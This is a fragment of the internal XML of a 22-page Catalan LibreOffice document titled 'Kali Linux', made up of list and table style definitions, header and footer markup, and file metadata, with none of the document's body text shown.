      <style:text-properties fo:color="#a40000" loext:opacity="100%" fo:font-weight="bold"/>
    </style:style>
    <style:style style:name="NormalTok"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list-style style:name="List_20_1" style:display-name="List 1">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2" style:display-name="List 2">
      <text:list-level-style-bullet text:level="1" text:style-name="Numbering_20_Symbols" loext:num-list-format="%1%" text:bullet-char="–">
        <style:list-level-properties text:min-label-width="0.3cm"/>
        <style:text-properties fo:font-family="StarSymbol"/>
      </text:list-level-style-bullet>
      <text:list-level-style-bullet text:level="2" text:style-name="Numbering_20_Symbols" loext:num-list-format="%2%" text:bullet-char="–">
        <style:list-level-properties text:space-before="0.3cm" text:min-label-width="0.3cm"/>
        <style:text-properties fo:font-family="StarSymbol"/>
      </text:list-level-style-bullet>
      <text:list-level-style-bullet text:level="3" text:style-name="Numbering_20_Symbols" loext:num-list-format="%3%" text:bullet-char="–">
        <style:list-level-properties text:space-before="0.6cm" text:min-label-width="0.3cm"/>
        <style:text-properties fo:font-family="StarSymbol"/>
      </text:list-level-style-bullet>
      <text:list-level-style-bullet text:level="4" text:style-name="Numbering_20_Symbols" loext:num-list-format="%4%" text:bullet-char="–">
        <style:list-level-properties text:space-before="0.899cm" text:min-label-width="0.3cm"/>
        <style:text-properties fo:font-family="StarSymbol"/>
      </text:list-level-style-bullet>
      <text:list-level-style-bullet text:level="5" text:style-name="Numbering_20_Symbols" loext:num-list-format="%5%" text:bullet-char="–">
        <style:list-level-properties text:space-before="1.199cm" text:min-label-width="0.3cm"/>
        <style:text-properties fo:font-family="StarSymbol"/>
      </text:list-level-style-bullet>
      <text:list-level-style-bullet text:level="6" text:style-name="Numbering_20_Symbols" loext:num-list-format="%6%" text:bullet-char="–">
        <style:list-level-properties text:space-before="1.499cm" text:min-label-width="0.3cm"/>
        <style:text-properties fo:font-family="StarSymbol"/>
      </text:list-level-style-bullet>
      <text:list-level-style-bullet text:level="7" text:style-name="Numbering_20_Symbols" loext:num-list-format="%7%" text:bullet-char="–">
        <style:list-level-properties text:space-before="1.801cm" text:min-label-width="0.3cm"/>
        <style:text-properties fo:font-family="StarSymbol"/>
      </text:list-level-style-bullet>
      <text:list-level-style-bullet text:level="8" text:style-name="Numbering_20_Symbols" loext:num-list-format="%8%" text:bullet-char="–">
        <style:list-level-properties text:space-before="2.101cm" text:min-label-width="0.3cm"/>
        <style:text-properties fo:font-family="StarSymbol"/>
      </text:list-level-style-bullet>
      <text:list-level-style-bullet text:level="9" text:style-name="Numbering_20_Symbols" loext:num-list-format="%9%" text:bullet-char="–">
        <style:list-level-properties text:space-before="2.401cm" text:min-label-width="0.3cm"/>
        <style:text-properties fo:font-family="StarSymbol"/>
      </text:list-level-style-bullet>
      <text:list-level-style-bullet text:level="10" text:style-name="Numbering_20_Symbols" loext:num-list-format="%10%" text:bullet-char="–">
        <style:list-level-properties text:space-before="2.7cm" text:min-label-width="0.3cm"/>
        <style:text-properties fo:font-family="StarSymbol"/>
      </text:list-level-style-bullet>
    </text:list-style>
    <text:list-style style:name="List_20_3" style:display-name="List 3">
      <text:list-level-style-bullet text:level="1" text:style-name="Numbering_20_Symbols" loext:num-list-format="%1%" text:bullet-char="☑">
        <style:list-level-properties text:min-label-width="0.395cm"/>
        <style:text-properties fo:font-family="StarSymbol"/>
      </text:list-level-style-bullet>
      <text:list-level-style-bullet text:level="2" text:style-name="Numbering_20_Symbols" loext:num-list-format="%2%" text:bullet-char="□">
        <style:list-level-properties text:space-before="0.395cm" text:min-label-width="0.395cm"/>
        <style:text-properties fo:font-family="StarSymbol"/>
      </text:list-level-style-bullet>
      <text:list-level-style-bullet text:level="3" text:style-name="Numbering_20_Symbols" loext:num-list-format="%3%" text:bullet-char="☑">
        <style:list-level-properties text:min-label-width="0.395cm"/>
        <style:text-properties fo:font-family="StarSymbol"/>
      </text:list-level-style-bullet>
      <text:list-level-style-bullet text:level="4" text:style-name="Numbering_20_Symbols" loext:num-list-format="%4%" text:bullet-char="□">
        <style:list-level-properties text:space-before="0.395cm" text:min-label-width="0.395cm"/>
        <style:text-properties fo:font-family="StarSymbol"/>
      </text:list-level-style-bullet>
      <text:list-level-style-bullet text:level="5" text:style-name="Numbering_20_Symbols" loext:num-list-format="%5%" text:bullet-char="☑">
        <style:list-level-properties text:min-label-width="0.395cm"/>
        <style:text-properties fo:font-family="StarSymbol"/>
      </text:list-level-style-bullet>
      <text:list-level-style-bullet text:level="6" text:style-name="Numbering_20_Symbols" loext:num-list-format="%6%" text:bullet-char="□">
        <style:list-level-properties text:space-before="0.395cm" text:min-label-width="0.395cm"/>
        <style:text-properties fo:font-family="StarSymbol"/>
      </text:list-level-style-bullet>
      <text:list-level-style-bullet text:level="7" text:style-name="Numbering_20_Symbols" loext:num-list-format="%7%" text:bullet-char="☑">
        <style:list-level-properties text:min-label-width="0.395cm"/>
        <style:text-properties fo:font-family="StarSymbol"/>
      </text:list-level-style-bullet>
      <text:list-level-style-bullet text:level="8" text:style-name="Numbering_20_Symbols" loext:num-list-format="%8%" text:bullet-char="□">
        <style:list-level-properties text:space-before="0.395cm" text:min-label-width="0.395cm"/>
        <style:text-properties fo:font-family="StarSymbol"/>
      </text:list-level-style-bullet>
      <text:list-level-style-bullet text:level="9" text:style-name="Numbering_20_Symbols" loext:num-list-format="%9%" text:bullet-char="☑">
        <style:list-level-properties text:min-label-width="0.395cm"/>
        <style:text-properties fo:font-family="StarSymbol"/>
      </text:list-level-style-bullet>
      <text:list-level-style-bullet text:level="10" text:style-name="Numbering_20_Symbols" loext:num-list-format="%10%" text:bullet-char="□">
        <style:list-level-properties text:space-before="0.395cm" text:min-label-width="0.395cm"/>
        <style:text-properties fo:font-family="StarSymbol"/>
      </text:list-level-style-bullet>
    </text:list-style>
    <text:list-style style:name="List_20_4" style:display-name="List 4">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List_20_5" style:display-name="List 5">
      <text:list-level-style-bullet text:level="1" text:style-name="Numbering_20_Symbols" loext:num-list-format="%1%" text:bullet-char="✗">
        <style:list-level-properties text:min-label-width="0.4cm"/>
        <style:text-properties fo:font-family="StarSymbol"/>
      </text:list-level-style-bullet>
      <text:list-level-style-bullet text:level="2" text:style-name="Numbering_20_Symbols" loext:num-list-format="%2%" text:bullet-char="✗">
        <style:list-level-properties text:space-before="0.401cm" text:min-label-width="0.4cm"/>
        <style:text-properties fo:font-family="StarSymbol"/>
      </text:list-level-style-bullet>
      <text:list-level-style-bullet text:level="3" text:style-name="Numbering_20_Symbols" loext:num-list-format="%3%" text:bullet-char="✗">
        <style:list-level-properties text:space-before="0.799cm" text:min-label-width="0.4cm"/>
        <style:text-properties fo:font-family="StarSymbol"/>
      </text:list-level-style-bullet>
      <text:list-level-style-bullet text:level="4" text:style-name="Numbering_20_Symbols" loext:num-list-format="%4%" text:bullet-char="✗">
        <style:list-level-properties text:space-before="1.2cm" text:min-label-width="0.4cm"/>
        <style:text-properties fo:font-family="StarSymbol"/>
      </text:list-level-style-bullet>
      <text:list-level-style-bullet text:level="5" text:style-name="Numbering_20_Symbols" loext:num-list-format="%5%" text:bullet-char="✗">
        <style:list-level-properties text:space-before="1.6cm" text:min-label-width="0.4cm"/>
        <style:text-properties fo:font-family="StarSymbol"/>
      </text:list-level-style-bullet>
      <text:list-level-style-bullet text:level="6" text:style-name="Numbering_20_Symbols" loext:num-list-format="%6%" text:bullet-char="✗">
        <style:list-level-properties text:space-before="2.001cm" text:min-label-width="0.4cm"/>
        <style:text-properties fo:font-family="StarSymbol"/>
      </text:list-level-style-bullet>
      <text:list-level-style-bullet text:level="7" text:style-name="Numbering_20_Symbols" loext:num-list-format="%7%" text:bullet-char="✗">
        <style:list-level-properties text:space-before="2.399cm" text:min-label-width="0.4cm"/>
        <style:text-properties fo:font-family="StarSymbol"/>
      </text:list-level-style-bullet>
      <text:list-level-style-bullet text:level="8" text:style-name="Numbering_20_Symbols" loext:num-list-format="%8%" text:bullet-char="✗">
        <style:list-level-properties text:space-before="2.8cm" text:min-label-width="0.4cm"/>
        <style:text-properties fo:font-family="StarSymbol"/>
      </text:list-level-style-bullet>
      <text:list-level-style-bullet text:level="9" text:style-name="Numbering_20_Symbols" loext:num-list-format="%9%" text:bullet-char="✗">
        <style:list-level-properties text:space-before="3.2cm" text:min-label-width="0.4cm"/>
        <style:text-properties fo:font-family="StarSymbol"/>
      </text:list-level-style-bullet>
      <text:list-level-style-bullet text:level="10" text:style-name="Numbering_20_Symbols" loext:num-list-format="%10%" text:bullet-char="✗">
        <style:list-level-properties text:space-before="3.601cm" text:min-label-width="0.4cm"/>
        <style:text-properties fo:font-family="StarSymbol"/>
      </text:list-level-style-bullet>
    </text:list-style>
    <text:list-style style:name="Numbering_20_1" style:display-name="Numbering 1">
      <text:list-level-style-number text:level="1" text:style-name="Numbering_20_Symbols" loext:num-list-format="%1%." style:num-suffix="." style:num-format="1">
        <style:list-level-properties text:min-label-width="0.499cm"/>
      </text:list-level-style-number>
      <text:list-level-style-number text:level="2" text:style-name="Numbering_20_Symbols" loext:num-list-format="%2%." style:num-suffix="." style:num-format="1">
        <style:list-level-properties text:space-before="0.501cm" text:min-label-width="0.499cm"/>
      </text:list-level-style-number>
      <text:list-level-style-number text:level="3" text:style-name="Numbering_20_Symbols" loext:num-list-format="%3%." style:num-suffix="." style:num-format="1">
        <style:list-level-properties text:space-before="1cm" text:min-label-width="0.499cm"/>
      </text:list-level-style-number>
      <text:list-level-style-number text:level="4" text:style-name="Numbering_20_Symbols" loext:num-list-format="%4%." style:num-suffix="." style:num-format="1">
        <style:list-level-properties text:space-before="1.501cm" text:min-label-width="0.499cm"/>
      </text:list-level-style-number>
      <text:list-level-style-number text:level="5" text:style-name="Numbering_20_Symbols" loext:num-list-format="%5%." style:num-suffix="." style:num-format="1">
        <style:list-level-properties text:space-before="2cm" text:min-label-width="0.499cm"/>
      </text:list-level-style-number>
      <text:list-level-style-number text:level="6" text:style-name="Numbering_20_Symbols" loext:num-list-format="%6%." style:num-suffix="." style:num-format="1">
        <style:list-level-properties text:space-before="2.501cm" text:min-label-width="0.499cm"/>
      </text:list-level-style-number>
      <text:list-level-style-number text:level="7" text:style-name="Numbering_20_Symbols" loext:num-list-format="%7%." style:num-suffix="." style:num-format="1">
        <style:list-level-properties text:space-before="3.001cm" text:min-label-width="0.499cm"/>
      </text:list-level-style-number>
      <text:list-level-style-number text:level="8" text:style-name="Numbering_20_Symbols" loext:num-list-format="%8%." style:num-suffix="." style:num-format="1">
        <style:list-level-properties text:space-before="3.502cm" text:min-label-width="0.499cm"/>
      </text:list-level-style-number>
      <text:list-level-style-number text:level="9" text:style-name="Numbering_20_Symbols" loext:num-list-format="%9%." style:num-suffix="." style:num-format="1">
        <style:list-level-properties text:space-before="4.001cm" text:min-label-width="0.499cm"/>
      </text:list-level-style-number>
      <text:list-level-style-number text:level="10" text:style-name="Numbering_20_Symbols" loext:num-list-format="%10%." style:num-suffix="." style:num-format="1">
        <style:list-level-properties text:space-before="4.502cm" text:min-label-width="0.499cm"/>
      </text:list-level-style-number>
    </text:list-style>
    <text:list-style style:name="Numbering_20_2" style:display-name="Numbering 2">
      <text:list-level-style-number text:level="1" text:style-name="Numbering_20_Symbols" loext:num-list-format="%1%" style:num-format="1">
        <style:list-level-properties text:min-label-width="0.499cm"/>
      </text:list-level-style-number>
      <text:list-level-style-number text:level="2" text:style-name="Numbering_20_Symbols" loext:num-list-format="%2%" style:num-format="1" text:start-value="2">
        <style:list-level-properties text:space-before="0.499cm" text:min-label-width="0.499cm"/>
      </text:list-level-style-number>
      <text:list-level-style-number text:level="3" text:style-name="Numbering_20_Symbols" loext:num-list-format="%3%" style:num-format="1" text:start-value="3">
        <style:list-level-properties text:space-before="0.998cm" text:min-label-width="1cm"/>
      </text:list-level-style-number>
      <text:list-level-style-number text:level="4" text:style-name="Numbering_20_Symbols" loext:num-list-format="%4%" style:num-format="1" text:start-value="4">
        <style:list-level-properties text:space-before="1.998cm" text:min-label-width="1.251cm"/>
      </text:list-level-style-number>
      <text:list-level-style-number text:level="5" text:style-name="Numbering_20_Symbols" loext:num-list-format="%5%" style:num-format="1" text:start-value="5">
        <style:list-level-properties text:space-before="3.249cm" text:min-label-width="1.499cm"/>
      </text:list-level-style-number>
      <text:list-level-style-number text:level="6" text:style-name="Numbering_20_Symbols" loext:num-list-format="%6%" style:num-format="1" text:start-value="6">
        <style:list-level-properties text:space-before="4.748cm" text:min-label-width="1.801cm"/>
      </text:list-level-style-number>
      <text:list-level-style-number text:level="7" text:style-name="Numbering_20_Symbols" loext:num-list-format="%7%" style:num-format="1" text:start-value="7">
        <style:list-level-properties text:space-before="6.549cm" text:min-label-width="2.3cm"/>
      </text:list-level-style-number>
      <text:list-level-style-number text:level="8" text:style-name="Numbering_20_Symbols" loext:num-list-format="%8%" style:num-format="1" text:start-value="8">
        <style:list-level-properties text:space-before="8.849cm" text:min-label-width="2.6cm"/>
      </text:list-level-style-number>
      <text:list-level-style-number text:level="9" text:style-name="Numbering_20_Symbols" loext:num-list-format="%9%" style:num-format="1" text:start-value="9">
        <style:list-level-properties text:space-before="11.449cm" text:min-label-width="2.801cm"/>
      </text:list-level-style-number>
      <text:list-level-style-number text:level="10" text:style-name="Numbering_20_Symbols" loext:num-list-format="%10%"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loext:num-list-format="%1%" style:num-format="1">
        <style:list-level-properties text:min-label-width="3cm"/>
      </text:list-level-style-number>
      <text:list-level-style-number text:level="2" text:style-name="Numbering_20_Symbols" loext:num-list-format="%2%" style:num-format="1" text:start-value="2">
        <style:list-level-properties text:space-before="3.001cm" text:min-label-width="3cm"/>
      </text:list-level-style-number>
      <text:list-level-style-number text:level="3" text:style-name="Numbering_20_Symbols" loext:num-list-format="%3%" style:num-format="1" text:start-value="3">
        <style:list-level-properties text:space-before="6.001cm" text:min-label-width="3cm"/>
      </text:list-level-style-number>
      <text:list-level-style-number text:level="4" text:style-name="Numbering_20_Symbols" loext:num-list-format="%4%" style:num-format="1" text:start-value="4">
        <style:list-level-properties text:space-before="9.002cm" text:min-label-width="3cm"/>
      </text:list-level-style-number>
      <text:list-level-style-number text:level="5" text:style-name="Numbering_20_Symbols" loext:num-list-format="%5%" style:num-format="1" text:start-value="5">
        <style:list-level-properties text:space-before="12.002cm" text:min-label-width="3cm"/>
      </text:list-level-style-number>
      <text:list-level-style-number text:level="6" text:style-name="Numbering_20_Symbols" loext:num-list-format="%6%" style:num-format="1" text:start-value="6">
        <style:list-level-properties text:space-before="15.002cm" text:min-label-width="3cm"/>
      </text:list-level-style-number>
      <text:list-level-style-number text:level="7" text:style-name="Numbering_20_Symbols" loext:num-list-format="%7%" style:num-format="1" text:start-value="7">
        <style:list-level-properties text:space-before="18.003cm" text:min-label-width="3cm"/>
      </text:list-level-style-number>
      <text:list-level-style-number text:level="8" text:style-name="Numbering_20_Symbols" loext:num-list-format="%8%" style:num-format="1" text:start-value="8">
        <style:list-level-properties text:space-before="21.003cm" text:min-label-width="3cm"/>
      </text:list-level-style-number>
      <text:list-level-style-number text:level="9" text:style-name="Numbering_20_Symbols" loext:num-list-format="%9%" style:num-format="1" text:start-value="9">
        <style:list-level-properties text:space-before="24.003cm" text:min-label-width="3cm"/>
      </text:list-level-style-number>
      <text:list-level-style-number text:level="10" text:style-name="Numbering_20_Symbols" loext:num-list-format="%10%" style:num-format="1" text:start-value="10">
        <style:list-level-properties text:space-before="27.004cm" text:min-label-width="3cm"/>
      </text:list-level-style-number>
    </text:list-style>
    <text:list-style style:name="Numbering_20_4" style:display-name="Numbering 4">
      <text:list-level-style-number text:level="1" text:style-name="Numbering_20_Symbols" loext:num-list-format="%1%." style:num-suffix="." style:num-format="I">
        <style:list-level-properties text:min-label-width="0.499cm"/>
      </text:list-level-style-number>
      <text:list-level-style-number text:level="2" text:style-name="Numbering_20_Symbols" loext:num-list-format="%2%." style:num-suffix="." style:num-format="I" text:start-value="2">
        <style:list-level-properties text:space-before="0.501cm" text:min-label-width="0.499cm"/>
      </text:list-level-style-number>
      <text:list-level-style-number text:level="3" text:style-name="Numbering_20_Symbols" loext:num-list-format="%3%." style:num-suffix="." style:num-format="I" text:start-value="3">
        <style:list-level-properties text:space-before="1cm" text:min-label-width="0.499cm"/>
      </text:list-level-style-number>
      <text:list-level-style-number text:level="4" text:style-name="Numbering_20_Symbols" loext:num-list-format="%4%." style:num-suffix="." style:num-format="I" text:start-value="4">
        <style:list-level-properties text:space-before="1.501cm" text:min-label-width="0.499cm"/>
      </text:list-level-style-number>
      <text:list-level-style-number text:level="5" text:style-name="Numbering_20_Symbols" loext:num-list-format="%5%." style:num-suffix="." style:num-format="I" text:start-value="5">
        <style:list-level-properties text:space-before="2cm" text:min-label-width="0.499cm"/>
      </text:list-level-style-number>
      <text:list-level-style-number text:level="6" text:style-name="Numbering_20_Symbols" loext:num-list-format="%6%." style:num-suffix="." style:num-format="I" text:start-value="6">
        <style:list-level-properties text:space-before="2.501cm" text:min-label-width="0.499cm"/>
      </text:list-level-style-number>
      <text:list-level-style-number text:level="7" text:style-name="Numbering_20_Symbols" loext:num-list-format="%7%." style:num-suffix="." style:num-format="I" text:start-value="7">
        <style:list-level-properties text:space-before="3.001cm" text:min-label-width="0.499cm"/>
      </text:list-level-style-number>
      <text:list-level-style-number text:level="8" text:style-name="Numbering_20_Symbols" loext:num-list-format="%8%." style:num-suffix="." style:num-format="I" text:start-value="8">
        <style:list-level-properties text:space-before="3.502cm" text:min-label-width="0.499cm"/>
      </text:list-level-style-number>
      <text:list-level-style-number text:level="9" text:style-name="Numbering_20_Symbols" loext:num-list-format="%9%." style:num-suffix="." style:num-format="I" text:start-value="9">
        <style:list-level-properties text:space-before="4.001cm" text:min-label-width="0.499cm"/>
      </text:list-level-style-number>
      <text:list-level-style-number text:level="10" text:style-name="Numbering_20_Symbols" loext:num-list-format="%10%."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loext:num-list-format="%1%." style:num-suffix="." style:num-format="1">
        <style:list-level-properties text:min-label-width="0.4cm"/>
      </text:list-level-style-number>
      <text:list-level-style-number text:level="2" text:style-name="Numbering_20_Symbols" loext:num-list-format="%1%.%2%." style:num-suffix="." style:num-format="1" text:start-value="2" text:display-levels="2">
        <style:list-level-properties text:space-before="0.45cm" text:min-label-width="0.651cm"/>
      </text:list-level-style-number>
      <text:list-level-style-number text:level="3" text:style-name="Numbering_20_Symbols" loext:num-list-format="%3%)" style:num-suffix=")" style:num-format="a" text:start-value="3">
        <style:list-level-properties text:space-before="1.1cm" text:min-label-width="0.45cm"/>
      </text:list-level-style-number>
      <text:list-level-style-bullet text:level="4" text:style-name="Numbering_20_Symbols" loext:num-list-format="%4%" text:bullet-char="•">
        <style:list-level-properties text:space-before="1.605cm" text:min-label-width="0.395cm"/>
        <style:text-properties fo:font-family="StarSymbol"/>
      </text:list-level-style-bullet>
      <text:list-level-style-bullet text:level="5" text:style-name="Numbering_20_Symbols" loext:num-list-format="%5%" text:bullet-char="•">
        <style:list-level-properties text:space-before="2cm" text:min-label-width="0.395cm"/>
        <style:text-properties fo:font-family="StarSymbol"/>
      </text:list-level-style-bullet>
      <text:list-level-style-bullet text:level="6" text:style-name="Numbering_20_Symbols" loext:num-list-format="%6%" text:bullet-char="•">
        <style:list-level-properties text:space-before="2.395cm" text:min-label-width="0.395cm"/>
        <style:text-properties fo:font-family="StarSymbol"/>
      </text:list-level-style-bullet>
      <text:list-level-style-bullet text:level="7" text:style-name="Numbering_20_Symbols" loext:num-list-format="%7%" text:bullet-char="•">
        <style:list-level-properties text:space-before="2.791cm" text:min-label-width="0.395cm"/>
        <style:text-properties fo:font-family="StarSymbol"/>
      </text:list-level-style-bullet>
      <text:list-level-style-bullet text:level="8" text:style-name="Numbering_20_Symbols" loext:num-list-format="%8%" text:bullet-char="•">
        <style:list-level-properties text:space-before="3.186cm" text:min-label-width="0.395cm"/>
        <style:text-properties fo:font-family="StarSymbol"/>
      </text:list-level-style-bullet>
      <text:list-level-style-bullet text:level="9" text:style-name="Numbering_20_Symbols" loext:num-list-format="%9%" text:bullet-char="•">
        <style:list-level-properties text:space-before="3.581cm" text:min-label-width="0.395cm"/>
        <style:text-properties fo:font-family="StarSymbol"/>
      </text:list-level-style-bullet>
      <text:list-level-style-bullet text:level="10" text:style-name="Numbering_20_Symbols" loext:num-list-format="%10%" text:bullet-char="•">
        <style:list-level-properties text:space-before="3.976cm" text:min-label-width="0.395cm"/>
        <style:text-properties fo:font-family="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ula3" style:family="table">
      <style:table-properties style:width="17.007cm" fo:margin-left="0cm" table:align="left"/>
    </style:style>
    <style:style style:name="Taula3.A" style:family="table-column">
      <style:table-column-properties style:column-width="14.875cm"/>
    </style:style>
    <style:style style:name="Taula3.B" style:family="table-column">
      <style:table-column-properties style:column-width="2.133cm"/>
    </style:style>
    <style:style style:name="Taula3.A1" style:family="table-cell">
      <style:table-cell-properties style:vertical-align="bottom" fo:padding="0.097cm" fo:border="none"/>
    </style:style>
    <style:style style:name="Taula3.B1" style:family="table-cell">
      <style:table-cell-properties style:vertical-align="middle" fo:padding="0.097cm" fo:border="none"/>
    </style:style>
    <style:style style:name="MP1" style:family="paragraph" style:parent-style-name="Text_20_body">
      <loext:graphic-properties draw:fill-hatch-name="hatch"/>
      <style:paragraph-properties>
        <style:tab-stops>
          <style:tab-stop style:position="0cm"/>
          <style:tab-stop style:position="8.5cm" style:type="center"/>
          <style:tab-stop style:position="17cm" style:type="right"/>
        </style:tab-stops>
      </style:paragraph-properties>
      <style:text-properties officeooo:rsid="00301231" officeooo:paragraph-rsid="00301231"/>
    </style:style>
    <style:style style:name="MP2" style:family="paragraph" style:parent-style-name="Footer">
      <style:text-properties fo:color="#b2b2b2" loext:opacity="100%" style:font-name="Helvetica" fo:font-size="6pt" officeooo:rsid="00320de5" officeooo:paragraph-rsid="00320de5" style:font-size-asian="6pt" style:font-size-complex="6pt"/>
    </style:style>
    <style:style style:name="MP3" style:family="paragraph" style:parent-style-name="Footer">
      <style:paragraph-properties fo:text-align="center" style:justify-single-word="false"/>
    </style:style>
    <style:style style:name="MP4" style:family="paragraph" style:parent-style-name="Footer">
      <style:paragraph-properties fo:text-align="start" style:justify-single-word="false"/>
      <style:text-properties fo:font-size="11pt" officeooo:rsid="001729d5" style:font-size-asian="11pt" style:font-size-complex="11pt"/>
    </style:style>
    <style:style style:name="MT1" style:family="text">
      <style:text-properties officeooo:rsid="004a9d36"/>
    </style:style>
    <style:style style:name="MT2" style:family="text">
      <style:text-properties fo:font-size="11pt" style:font-size-asian="11pt" style:font-size-complex="11pt"/>
    </style:style>
    <style:style style:name="MT3" style:family="text">
      <style:text-properties officeooo:rsid="001729d5"/>
    </style:style>
    <style:style style:name="MT4" style:family="text">
      <style:text-properties fo:font-size="11pt" officeooo:rsid="001729d5" style:font-size-asian="11pt" style:font-size-complex="11pt"/>
    </style:style>
    <style:style style:name="Mfr1" style:family="graphic" style:parent-style-name="Graphics">
      <style:graphic-properties fo:margin-left="0cm" fo:margin-right="0cm" fo:margin-top="0cm" fo:margin-bottom="0cm" style:run-through="background" style:wrap="parallel" style:number-wrapped-paragraphs="no-limit" style:wrap-contour="false" style:vertical-pos="middle" style:vertical-rel="baselin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411cm" fo:margin-bottom="0.859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998cm" fo:margin-left="0cm" fo:margin-right="0cm" fo:margin-bottom="0.499cm" fo:background-color="transparent" style:dynamic-spacing="true" draw:fill="none" draw:fill-color="#729fcf"/>
      </style:header-style>
      <style:footer-style>
        <style:header-footer-properties fo:min-height="1.889cm" fo:margin-left="0cm" fo:margin-right="0cm" fo:margin-top="0.499cm" fo:background-color="transparent" style:dynamic-spacing="tru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1.png" text:anchor-type="as-char" svg:width="5.145cm" svg:height="1.323cm" draw:z-index="21"><draw:image xlink:href="Pictures/100000000000010D0000004585066606.png" xlink:type="simple" xlink:show="embed" xlink:actuate="onLoad" draw:mime-type="image/png"/></draw:frame><text:tab/><text:tab/><draw:frame draw:style-name="Mfr1" draw:name="image2.png" text:anchor-type="as-char" svg:width="1.984cm" svg:height="1.323cm" draw:z-index="43"><draw:image xlink:href="Pictures/10000001000004BC000003222B5D4C9B.png" xlink:type="simple" xlink:show="embed" xlink:actuate="onLoad" draw:mime-type="image/png"/></draw:frame></text:p>
      </style:header>
      <style:footer>
        <table:table table:name="Taula3" table:style-name="Taula3">
          <table:table-column table:style-name="Taula3.A"/>
          <table:table-column table:style-name="Taula3.B"/>
          <table:table-row>
            <table:table-cell table:style-name="Taula3.A1" office:value-type="string">
              <text:p text:style-name="MP2">Plantilla 202<text:span text:style-name="MT1">6</text:span>-<text:span text:style-name="MT1">03</text:span></text:p>
            </table:table-cell>
            <table:table-cell table:style-name="Taula3.B1" office:value-type="string">
              <text:p text:style-name="MP3"><text:span text:style-name="MT2"><text:page-number text:select-page="current">22</text:page-number></text:span><text:s/><text:span text:style-name="MT3">de </text:span><text:span text:style-name="MT4"><text:page-count>22</text:page-count></text:span></text:p>
            </table:table-cell>
          </table:table-row>
        </table:table>
        <text:p text:style-name="MP4"/>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3.2$Linux_X86_64 LibreOffice_project/520$Build-2</meta:generator>
    <dc:title>Kali Linux</dc:title>
    <dc:description/>
    <dc:subject/>
    <meta:keyword/>
    <dc:language>ca</dc:language>
    <meta:initial-creator/>
    <dc:creator>ramon lopez</dc:creator>
    <meta:creation-date>2026-08-08T18:06:27Z</meta:creation-date>
    <dc:date>2026-08-08T20:06:29.124635368</dc:date>
    <meta:editing-duration>P0D</meta:editing-duration>
    <meta:editing-cycles>1</meta:editing-cycles>
    <meta:document-statistic meta:table-count="7" meta:image-count="4" meta:object-count="0" meta:page-count="22" meta:paragraph-count="678" meta:word-count="3968" meta:character-count="33378" meta:non-whitespace-character-count="25187"/>
    <meta:user-defined meta:name="toc-title">Índex</meta:user-defined>
  </office:meta>
</office:document-meta>
</file>